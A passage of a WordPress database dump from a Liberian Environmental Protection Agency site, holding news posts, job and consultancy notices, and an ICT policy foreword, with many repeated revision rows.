13:35:02','','Dr','','inherit','open','closed','','dr','','','2026-04-23 13:35:02','2026-04-23 13:35:02','',5878,'https://ekmsliberia.info/wp-content/uploads/2026/04/Dr.jpg',0,'attachment','image/jpeg',0),(5880,38,'2026-04-23 14:17:36','2026-04-23 14:17:36','<!-- wp:paragraph -->\n<p>Monrovia, April 17, 2026 – The Environmental Protection Agency (EPA) and the United Nations Development Programme (UNDP) have held a strategic engagement with former Liberian President Ellen Johnson Sirleaf as part of ongoing consultations with national stakeholders on climate resilience and coastal protection efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The interaction which took place in Monrovia Thursday, forms part of broader institutional engagements around Liberia’s climate agenda, focused on the increasing impact of coastal erosion in vulnerable communities across Monrovia and other coastal areas. Participants shared perspectives on strengthening adaptation measures and scaling up practical interventions to safeguard communities and infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director, Dr. Emmanuel King Urey Yarkpawolo, and UNDP Country Representative, Aleiou M. Dia, emphasized the importance of inclusive dialogue and multi-stakeholder collaboration in advancing national climate priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Discussions also highlighted opportunities to mobilize climate financing, including the potential development of a coastal defense and livelihood support concept for submission to the Fund for Loss and Damage. The initiative is expected to integrate both engineered and nature-based solutions while supporting livelihoods in at-risk communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The engagement further explored collaboration between UNDP and the Ellen Johnson Sirleaf Presidential Center for Women and Development, particularly in the areas of capacity building and women’s leadership in climate resilience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5879,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/Dr-859x1024.jpg\" alt=\"\" class=\"wp-image-5879\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>As part of ongoing knowledge-sharing efforts, Dr. Yarkpawolo presented key national policy documents, including the Natural Capital Atlas of Liberia and the Local County Action Plans, reflecting Liberia’s commitment to data-driven and locally grounded climate action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also in attendance were Ellen Pratt, Executive Director of the Sirleaf Presidential Center, Salimatu Gilyeneh of UNDP, and other stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The engagement underscores the role of broad-based partnerships in supporting Liberia’s climate resilience and sustainable development agenda</p>\n<!-- /wp:paragraph -->','EPA, UNDP, Former President Sirleaf Engage on Climate Resilience and Coastal Protection','','inherit','closed','closed','','5878-revision-v1','','','2026-04-23 14:17:36','2026-04-23 14:17:36','',5878,'https://ekmsliberia.info/?p=5880',0,'revision','',0),(5882,38,'2026-04-29 11:31:21','2026-04-29 11:31:21','','today','','inherit','open','closed','','today','','','2026-04-29 11:31:21','2026-04-29 11:31:21','',5881,'https://ekmsliberia.info/wp-content/uploads/2026/04/today.jpg',0,'attachment','image/jpeg',0),(5883,38,'2026-04-29 11:32:38','2026-04-29 11:32:38','<!-- wp:paragraph -->\n<p>Monrovia, April 29, 2026_Three staff from the Environmental Protection Agency of Liberia have returned home after completing an international training program on carbon neutrality and green economy development in the People\'s Republic of China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The staff are are from the Compliance and Enforcement Department of the agency. They are Victoria Jones Harmon, Head of EPA Inspectors in Margibi County, Victor Gblee, Head of Inspectors in Bong County, and Romel Fahnbulleh, an EPA Inspector in Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, held from April 10 to April 23, was organized under the Global Development Initiative. It brought together participants from different countries to build knowledge and strengthen cooperation on climate change and sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the program, the participants learned about carbon peaking, carbon neutrality, and ways countries can grow their economies while protecting the environment. These are key areas under the United Nations Framework Convention on Climate Change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training included classroom lectures, group discussions, and field visits. The inspectors gained both theory and practical knowledge on how countries can move to low-carbon development and build strong systems to respond to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They also learned about China’s development model, including its focus on green growth and environmental protection. As part of the training, they visited renewable energy sites, digital economy centers, and rural development projects. These visits helped them understand how China is working to achieve its carbon goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program also included discussions on how digital tools can support green transformation. Participants engaged with experts and research institutions, gaining ideas that can be applied in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition, the inspectors took part in cultural activities, including visits to the Great Wall of China and the Temple of Heaven, helping to promote cultural exchange and learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Upon their return, the three inspectors visited the Executive Director of the EPA, Emmanuel K. Urey Yarkpawolo, at his office in Monrovia. They thanked him for the opportunity and support that made their participation possible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They said the training has improved their skills and knowledge and will help them do their work better. They promised to use what they learned to support environmental protection and strengthen enforcement across Liberia. They also committed to sharing the knowledge with other staff of the agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inspectors also praised the Chinese Embassy in Liberia for providing the opportunity. They described the program as important for building the capacity of Liberian professionals and strengthening cooperation between Liberia and China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Dr. Yarkpawolo welcomed the inspectors back and congratulated them for completing the training. He said building the capacity of EPA staff remains a key focus of his leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that giving staff international exposure helps improve the work of the agency and prepares them to better handle environmental challenges. He encouraged the inspectors to apply what they learned and train others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also reaffirmed his commitment to continue working with partners to provide more training opportunities. He said such efforts will help strengthen the EPA and support sustainable development in Liberia.</p>\n<!-- /wp:paragraph -->','EPA Staff Returns From China After Completing Climate Training in Carbon Neutrality and Green Economy Development','','inherit','closed','closed','','5881-revision-v1','','','2026-04-29 11:32:38','2026-04-29 11:32:38','',5881,'https://ekmsliberia.info/?p=5883',0,'revision','',0),(5884,38,'2026-04-29 11:34:47','2026-04-29 11:34:47','<!-- wp:paragraph -->\n<p>Monrovia, April 29, 2026_The Executive Director of the Environmental Protection Agency of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, has praised the Liberian government for what he described as ongoing development efforts across key sectors of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking Monday evening April 27 when he appeared on the Class Reloaded Show, Dr. Yarkpawolo said the current administration is laying a solid foundation that will help move Liberia forward.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Under this administration, you can see that a lot is being done,” he said. “Whether in EPA, transport, or the water sector, there is a proper foundation being laid.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, many of the initiatives being introduced are new and, in some cases, have never existed in Liberia before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“A lot of these foundations have never existed before. Some of the things we are doing now were not even there prior to the war,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo described the government as one focused on building strong systems that will have long-term impact on the country’s development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I think this government is a government of foundation. And when the foundation is laid properly, Liberia will move forward,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director also highlighted ongoing work at the agency, noting that several new policies and regulations are being introduced to protect the environment and public safety.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the EPA Board has recently passed a new regulation on Liquefied Petroleum Gas (LPG), aimed at ensuring the safe use of cooking gas across the country. The regulation covers the full process, from importation to household use, including safety training to prevent accidents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition, Dr. Yarkpawolo raised concern about noise pollution, calling on Liberians to be mindful of others, especially at night.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“People need to sleep, people need to work, and children need to study. We must reduce unnecessary noise,” he stressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the EPA will continue public awareness efforts to educate citizens on environmental safety and regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo expressed confidence that with the current pace of reforms, Liberia is on the right path toward sustainable growth and development</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Executive Director Applauds Government’s Development Efforts Across Key Sectors','','publish','open','open','','epa-executive-director-applauds-governments-development-efforts-across-key-sectors','','','2026-04-29 11:34:51','2026-04-29 11:34:51','',0,'https://ekmsliberia.info/?p=5884',13,'post','',0),(5885,38,'2026-04-29 11:34:06','2026-04-29 11:34:06','','today','','inherit','open','closed','','today-2','','','2026-04-29 11:34:06','2026-04-29 11:34:06','',5884,'https://ekmsliberia.info/wp-content/uploads/2026/04/today-1.jpg',0,'attachment','image/jpeg',0),(5886,38,'2026-04-29 11:34:47','2026-04-29 11:34:47','<!-- wp:paragraph -->\n<p>Monrovia, April 29, 2026_The Executive Director of the Environmental Protection Agency of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, has praised the Liberian government for what he described as ongoing development efforts across key sectors of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking Monday evening April 27 when he appeared on the Class Reloaded Show, Dr. Yarkpawolo said the current administration is laying a solid foundation that will help move Liberia forward.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Under this administration, you can see that a lot is being done,” he said. “Whether in EPA, transport, or the water sector, there is a proper foundation being laid.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, many of the initiatives being introduced are new and, in some cases, have never existed in Liberia before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“A lot of these foundations have never existed before. Some of the things we are doing now were not even there prior to the war,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo described the government as one focused on building strong systems that will have long-term impact on the country’s development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I think this government is a government of foundation. And when the foundation is laid properly, Liberia will move forward,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director also highlighted ongoing work at the agency, noting that several new policies and regulations are being introduced to protect the environment and public safety.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the EPA Board has recently passed a new regulation on Liquefied Petroleum Gas (LPG), aimed at ensuring the safe use of cooking gas across the country. The regulation covers the full process, from importation to household use, including safety training to prevent accidents.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition, Dr. Yarkpawolo raised concern about noise pollution, calling on Liberians to be mindful of others, especially at night.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“People need to sleep, people need to work, and children need to study. We must reduce unnecessary noise,” he stressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the EPA will continue public awareness efforts to educate citizens on environmental safety and regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo expressed confidence that with the current pace of reforms, Liberia is on the right path toward sustainable growth and development</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Executive Director Applauds Government’s Development Efforts Across Key Sectors','','inherit','closed','closed','','5884-revision-v1','','','2026-04-29 11:34:47','2026-04-29 11:34:47','',5884,'https://ekmsliberia.info/?p=5886',0,'revision','',0),(5895,38,'2026-05-26 12:44:43','2026-05-26 12:44:43','<strong>BACKGROUND </strong>\r\n\r\nLiberia possesses natural resources and fertile land along with valuable fishing areas; however, it grapples with development hurdles linked to environmental damage and inadequate infrastructure and institutions despite its abundance of resources. The nation encounters difficulties in enhancing smallholder agriculture and fisheries performance that impact people’s livelihood opportunities well as food security and hinder overall economic progress. The Country also faces challenges due to the extensive damage to its land and coastal regions caused mainly by unchecked human actions like building construction and roads as well as mining activities and urban growth that led to pollution issues. These harmful activities have greatly harmed the ecosystems for supporting agriculture and fishing industries. The impacts of climate change exacerbate these dangers by hastening land and coastal deterioration while diminishing the resources essential for the local communities’ sustenance. The ecosystems in the country are facing challenges with a focus specifically being placed upon wetlands and coastal areas such as mangroves which play a key role as protective barriers during storms and habitats for marine life growth; these areas are at high risk due to rising sea levels and temperatures along with more powerful storm surges present in the oceans today causing concerns for both biodiversity loss and increased threats of flooding and erosion to nearby coastal communities. Liberia’s economy and communities are greatly affected by the effects of climate change with a focus particularly toward increased flooding and coastal erosion caused by rising sea levels and severe weather conditions like storm surges in regions such as Monrovia and other cities in Liberia including Robertsport and Harper where informal settlements face significant risks due to lack of proper infrastructure leading to regular flooding incidents causing damage to buildings and infrastructure as well as health issues due to sanitation problems. Rising ocean temperatures pose a threat to marine environments beyond just physical dangers by putting fish stocks at risk. Crucial for the nation’s fisheries and food security backbone. The issue of overfishing worsens with the deterioration of mangroves and coastal habitats leading to a decline in fish populations. As per the IPCCs Assessment Report, findings suggest that West Africa is anticipated to be heavily impacted by climate change with projections pointing towards elevated temperatures and more frequent occurrences of heatwaves and extreme precipitation events which could result in increased flooding, especially, in Liberia and neighboring regions.\r\n\r\n<strong>OBJECTIVE </strong>\r\n\r\nThe Project Manager’s primary responsibility is to ensure that the Project delivers the results specified in the Project Document, to the required standard of quality and within the specified constraints of time and cost. The Project Manager will manage the day-to-day activities of the PMU and other stakeholders involved in the implementation of the Project by providing technical, management and coordination support. He/she will be working closely with a project team composed of the Administrative and Financial Assistant, Procurement Officer, Monitoring &amp; Evaluation Officer, Gender, Safeguard &amp; Stakeholder Engagement Expert, Knowledge Management &amp; Communication Officer, Innovative Finance Expert, and Driver. The Project Manager typically presents key deliverables and documents to the board for their review and approval, including.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Project Manager','','publish','closed','closed','','project-manager','','','2026-05-26 14:24:18','2026-05-26 14:24:18','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5895',7,'ekms_bulletin','',0),(5971,38,'2026-06-17 17:25:42','2026-06-17 17:25:42','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Climate-Change-for-LMS-on-EWS-Final-ToR-28.05.26.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CONSULTANCY: National Climate Change and Early Warning Expert','','publish','closed','closed','','consultancy-national-climate-change-and-early-warning-expert','','','2026-06-17 17:25:42','2026-06-17 17:25:42','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5971',3,'ekms_bulletin','',0),(5889,38,'2026-04-01 15:11:57','2026-04-01 15:11:57','It is my pleasure to introduce the Environmental Protection Agency’s ICT Policy. This document represents a major step forward safeguarding the Agency’s information assets, improving service delivery, and strengthening our ability to fulfil our mandate to protect Liberia’s environment. Information and communication technology is now central to how we deliver programs, manage environmental data, coordinate research, engage stakeholders, and administer our operations. This policy sets out clear, practical and enforceable measures to ensure our ICT environment is secure, resilient, efficient and user‑focused. It establishes standards for data protection, regular backup and recovery, malware and antivirus controls, access and password management, secure network use (including cloud access), asset procurement and disposal, email and communication usage, and ICT support and staff development.\r\n\r\nThese measures are designed to protect the confidentiality, integrity and availability of environmental and financial data while enabling timely access to information for legitimate business needs. The Policy further emphasizes governance, risk management and accountability. Roles and responsibilities are clearly defined so that the ICT Unit and staff users understand their obligations. Regular testing, monitoring and review are mandated to ensure backup and recovery processes meet our recovery time and point objectives and that security practices evolve alongside emerging threats and technologies. Equally important, the strategy commits to capacity building and service excellence, investing in staff skills, user training and collaborative arrangements that will improve the quality, accessibility and reliability of our ICT services','INFORMATION COMMUNICATION TECHNOLOGY (ICT)POLICY','','publish','closed','closed','','information-communication-technology-ictpolicy','','','2026-05-28 08:51:34','2026-05-28 08:51:34','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5889',6,'document','',0),(5890,38,'2026-05-10 15:04:44','2026-05-10 15:04:44','','Screenshot 2026-05-10 at 14.52.57','','inherit','open','closed','','screenshot-2026-05-10-at-14-52-57','','','2026-05-10 15:04:44','2026-05-10 15:04:44','',5889,'https://ekmsliberia.info/wp-content/uploads/2026/05/Screenshot-2026-05-10-at-14.52.57.png',0,'attachment','image/png',0),(5892,38,'2026-05-10 15:09:22','2026-05-10 15:09:22','','EPA ICT POLICY-Final','','inherit','open','closed','','epa-ict-policy-final','','','2026-05-10 15:09:22','2026-05-10 15:09:22','',5889,'https://ekmsliberia.info/wp-content/uploads/2026/05/EPA-ICT-POLICY-Final.pdf',0,'attachment','application/pdf',0),(5893,38,'2026-05-10 15:10:22','2026-05-10 15:10:22','It is my pleasure to introduce the Environmental Protection Agency’s ICT Policy. This document represents a major step forward safeguarding the Agency’s information assets, improving service delivery, and strengthening our ability to fulfil our mandate to protect Liberia’s environment. Information and communication technology is now central to how we deliver programs, manage environmental data, coordinate research, engage stakeholders, and administer our operations. This policy sets out clear, practical and enforceable measures to ensure our ICT environment is secure, resilient, efficient and user‑focused. It establishes standards for data protection, regular backup and recovery, malware and antivirus controls, access and password management, secure network use (including cloud access), asset procurement and disposal, email and communication usage, and ICT support and staff development.\r\n\r\nThese measures are designed to protect the confidentiality, integrity and availability of environmental and financial data while enabling timely access to information for legitimate business needs. The Policy further emphasizes governance, risk management and accountability. Roles and responsibilities are clearly defined so that the ICT Unit and staff users understand their obligations. Regular testing, monitoring and review are mandated to ensure backup and recovery processes meet our recovery time and point objectives and that security practices evolve alongside emerging threats and technologies. Equally important, the strategy commits to capacity building and service excellence, investing in staff skills, user training and collaborative arrangements that will improve the quality, accessibility and reliability of our ICT services','INFORMATION COMMUNICATION TECHNOLOGY (ICT)POLICY','','inherit','closed','closed','','5889-revision-v1','','','2026-05-10 15:10:22','2026-05-10 15:10:22','',5889,'https://ekmsliberia.info/?p=5893',0,'revision','',0),(5896,38,'2026-05-26 12:36:45','2026-05-26 12:36:45','<strong>BACKGROUND </strong>\r\n\r\nLiberia possesses natural resources and fertile land along with valuable fishing areas; however, it grapples with development hurdles linked to environmental damage and inadequate infrastructure and institutions despite its abundance of resources. The nation encounters difficulties in enhancing smallholder agriculture and fisheries performance that impact people’s livelihood opportunities well as food security and hinder overall economic progress. The Country also faces challenges due to the extensive damage to its land and coastal regions caused mainly by unchecked human actions like building construction and roads as well as mining activities and urban growth that led to pollution issues. These harmful activities have greatly harmed the ecosystems for supporting agriculture and fishing industries. The impacts of climate change exacerbate these dangers by hastening land and coastal deterioration while diminishing the resources essential for the local communities’ sustenance. The ecosystems in the country are facing challenges with a focus specifically being placed upon wetlands and coastal areas such as mangroves which play a key role as protective barriers during storms and habitats for marine life growth; these areas are at high risk due to rising sea levels and temperatures along with more powerful storm surges present in the oceans today causing concerns for both biodiversity loss and increased threats of flooding and erosion to nearby coastal communities. Liberia’s economy and communities are greatly affected by the effects of climate change with a focus particularly toward increased flooding and coastal erosion caused by rising sea levels and severe weather conditions like storm surges in regions such as Monrovia and other cities in Liberia including Robertsport and Harper where informal settlements face significant risks due to lack of proper infrastructure leading to regular flooding incidents causing damage to buildings and infrastructure as well as health issues due to sanitation problems. Rising ocean temperatures pose a threat to marine environments beyond just physical dangers by putting fish stocks at risk. Crucial for the nation’s fisheries and food security backbone. The issue of overfishing worsens with the deterioration of mangroves and coastal habitats leading to a decline in fish populations. As per the IPCCs Assessment Report, findings suggest that West Africa is anticipated to be heavily impacted by climate change with projections pointing towards elevated temperatures and more frequent occurrences of heatwaves and extreme precipitation events which could result in increased flooding, especially, in Liberia and neighboring regions.\r\n\r\n<strong>OBJECTIVE </strong>\r\n\r\nThe Project Manager’s primary responsibility is to ensure that the Project delivers the results specified in the Project Document, to the required standard of quality and within the specified constraints of time and cost. The Project Manager will manage the day-to-day activities of the PMU and other stakeholders involved in the implementation of the Project by providing technical, management and coordination support. He/she will be working closely with a project team composed of the Administrative and Financial Assistant, Procurement Officer, Monitoring &amp; Evaluation Officer, Gender, Safeguard &amp; Stakeholder Engagement Expert, Knowledge Management &amp; Communication Officer, Innovative Finance Expert, and Driver. The Project Manager typically presents key deliverables and documents to the board for their review and approval, including\r\n\r\n&nbsp;','Project Manager','','inherit','closed','closed','','5895-revision-v1','','','2026-05-26 12:36:45','2026-05-26 12:36:45','',5895,'https://ekmsliberia.info/?p=5896',0,'revision','',0),(5897,38,'2026-05-26 12:39:26','2026-05-26 12:39:26','','Final TOR_Project Manager_SARTLA+SG','','inherit','open','closed','','final-tor_project-manager_sartlasg','','','2026-05-26 12:39:26','2026-05-26 12:39:26','',0,'https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf',0,'attachment','application/pdf',0),(5898,38,'2026-05-26 12:41:48','2026-05-26 12:41:48','<strong>BACKGROUND </strong>\r\n\r\nLiberia possesses natural resources and fertile land along with valuable fishing areas; however, it grapples with development hurdles linked to environmental damage and inadequate infrastructure and institutions despite its abundance of resources. The nation encounters difficulties in enhancing smallholder agriculture and fisheries performance that impact people’s livelihood opportunities well as food security and hinder overall economic progress. The Country also faces challenges due to the extensive damage to its land and coastal regions caused mainly by unchecked human actions like building construction and roads as well as mining activities and urban growth that led to pollution issues. These harmful activities have greatly harmed the ecosystems for supporting agriculture and fishing industries. The impacts of climate change exacerbate these dangers by hastening land and coastal deterioration while diminishing the resources essential for the local communities’ sustenance. The ecosystems in the country are facing challenges with a focus specifically being placed upon wetlands and coastal areas such as mangroves which play a key role as protective barriers during storms and habitats for marine life growth; these areas are at high risk due to rising sea levels and temperatures along with more powerful storm surges present in the oceans today causing concerns for both biodiversity loss and increased threats of flooding and erosion to nearby coastal communities. Liberia’s economy and communities are greatly affected by the effects of climate change with a focus particularly toward increased flooding and coastal erosion caused by rising sea levels and severe weather conditions like storm surges in regions such as Monrovia and other cities in Liberia including Robertsport and Harper where informal settlements face significant risks due to lack of proper infrastructure leading to regular flooding incidents causing damage to buildings and infrastructure as well as health issues due to sanitation problems. Rising ocean temperatures pose a threat to marine environments beyond just physical dangers by putting fish stocks at risk. Crucial for the nation’s fisheries and food security backbone. The issue of overfishing worsens with the deterioration of mangroves and coastal habitats leading to a decline in fish populations. As per the IPCCs Assessment Report, findings suggest that West Africa is anticipated to be heavily impacted by climate change with projections pointing towards elevated temperatures and more frequent occurrences of heatwaves and extreme precipitation events which could result in increased flooding, especially, in Liberia and neighboring regions.\r\n\r\n<strong>OBJECTIVE </strong>\r\n\r\nThe Project Manager’s primary responsibility is to ensure that the Project delivers the results specified in the Project Document, to the required standard of quality and within the specified constraints of time and cost. The Project Manager will manage the day-to-day activities of the PMU and other stakeholders involved in the implementation of the Project by providing technical, management and coordination support. He/she will be working closely with a project team composed of the Administrative and Financial Assistant, Procurement Officer, Monitoring &amp; Evaluation Officer, Gender, Safeguard &amp; Stakeholder Engagement Expert, Knowledge Management &amp; Communication Officer, Innovative Finance Expert, and Driver. The Project Manager typically presents key deliverables and documents to the board for their review and approval, including.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Project Manager','','inherit','closed','closed','','5895-revision-v1','','','2026-05-26 12:41:48','2026-05-26 12:41:48','',5895,'https://ekmsliberia.info/?p=5898',0,'revision','',0),(5899,38,'2026-05-26 12:42:47','2026-05-26 12:42:47','','Final Recruitment strategy-SARTLA Project Manager SARTLA+SG','','inherit','open','closed','','final-recruitment-strategy-sartla-project-manager-sartlasg','','','2026-05-26 12:42:47','2026-05-26 12:42:47','',0,'https://ekmsliberia.info/wp-content/uploads/2026/05/Final-Recruitment-strategy-SARTLA-Project-Manager-SARTLASG.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5901,38,'2026-05-26 14:24:18','2026-05-26 14:24:18','<strong>BACKGROUND </strong>\r\n\r\nLiberia possesses natural resources and fertile land along with valuable fishing areas; however, it grapples with development hurdles linked to environmental damage and inadequate infrastructure and institutions despite its abundance of resources. The nation encounters difficulties in enhancing smallholder agriculture and fisheries performance that impact people’s livelihood opportunities well as food security and hinder overall economic progress. The Country also faces challenges due to the extensive damage to its land and coastal regions caused mainly by unchecked human actions like building construction and roads as well as mining activities and urban growth that led to pollution issues. These harmful activities have greatly harmed the ecosystems for supporting agriculture and fishing industries. The impacts of climate change exacerbate these dangers by hastening land and coastal deterioration while diminishing the resources essential for the local communities’ sustenance. The ecosystems in the country are facing challenges with a focus specifically being placed upon wetlands and coastal areas such as mangroves which play a key role as protective barriers during storms and habitats for marine life growth; these areas are at high risk due to rising sea levels and temperatures along with more powerful storm surges present in the oceans today causing concerns for both biodiversity loss and increased threats of flooding and erosion to nearby coastal communities. Liberia’s economy and communities are greatly affected by the effects of climate change with a focus particularly toward increased flooding and coastal erosion caused by rising sea levels and severe weather conditions like storm surges in regions such as Monrovia and other cities in Liberia including Robertsport and Harper where informal settlements face significant risks due to lack of proper infrastructure leading to regular flooding incidents causing damage to buildings and infrastructure as well as health issues due to sanitation problems. Rising ocean temperatures pose a threat to marine environments beyond just physical dangers by putting fish stocks at risk. Crucial for the nation’s fisheries and food security backbone. The issue of overfishing worsens with the deterioration of mangroves and coastal habitats leading to a decline in fish populations. As per the IPCCs Assessment Report, findings suggest that West Africa is anticipated to be heavily impacted by climate change with projections pointing towards elevated temperatures and more frequent occurrences of heatwaves and extreme precipitation events which could result in increased flooding, especially, in Liberia and neighboring regions.\r\n\r\n<strong>OBJECTIVE </strong>\r\n\r\nThe Project Manager’s primary responsibility is to ensure that the Project delivers the results specified in the Project Document, to the required standard of quality and within the specified constraints of time and cost. The Project Manager will manage the day-to-day activities of the PMU and other stakeholders involved in the implementation of the Project by providing technical, management and coordination support. He/she will be working closely with a project team composed of the Administrative and Financial Assistant, Procurement Officer, Monitoring &amp; Evaluation Officer, Gender, Safeguard &amp; Stakeholder Engagement Expert, Knowledge Management &amp; Communication Officer, Innovative Finance Expert, and Driver. The Project Manager typically presents key deliverables and documents to the board for their review and approval, including.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/05/Final-TOR_Project-Manager_SARTLASG.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Project Manager','','inherit','closed','closed','','5895-revision-v1','','','2026-05-26 14:24:18','2026-05-26 14:24:18','',5895,'https://ekmsliberia.info/?p=5901',0,'revision','',0),(5900,38,'2026-05-26 12:44:43','2026-05-26 12:44:43','<strong>BACKGROUND </strong>\r\n\r\nLiberia possesses natural resources and fertile land along with valuable fishing areas; however, it grapples with development hurdles linked to environmental damage and inadequate infrastructure and institutions despite its abundance of resources. The nation encounters difficulties in enhancing smallholder agriculture and fisheries performance that impact people’s livelihood opportunities well as food security and hinder overall economic progress. The Country also faces challenges due to the extensive damage to its land and coastal regions caused mainly by unchecked human actions like building construction and roads as well as mining activities and urban growth that led to pollution issues. These harmful activities have greatly harmed the ecosystems for supporting agriculture and fishing industries. The impacts of climate change exacerbate these dangers by hastening land and coastal deterioration while diminishing the resources essential for the local communities’ sustenance. The ecosystems in the country are facing challenges with a focus specifically being placed upon wetlands and coastal areas such as mangroves which play a key role as protective barriers during storms and habitats for marine life growth; these areas are at high risk due to rising sea levels and temperatures along with more powerful storm surges present in the oceans today causing concerns for both biodiversity loss 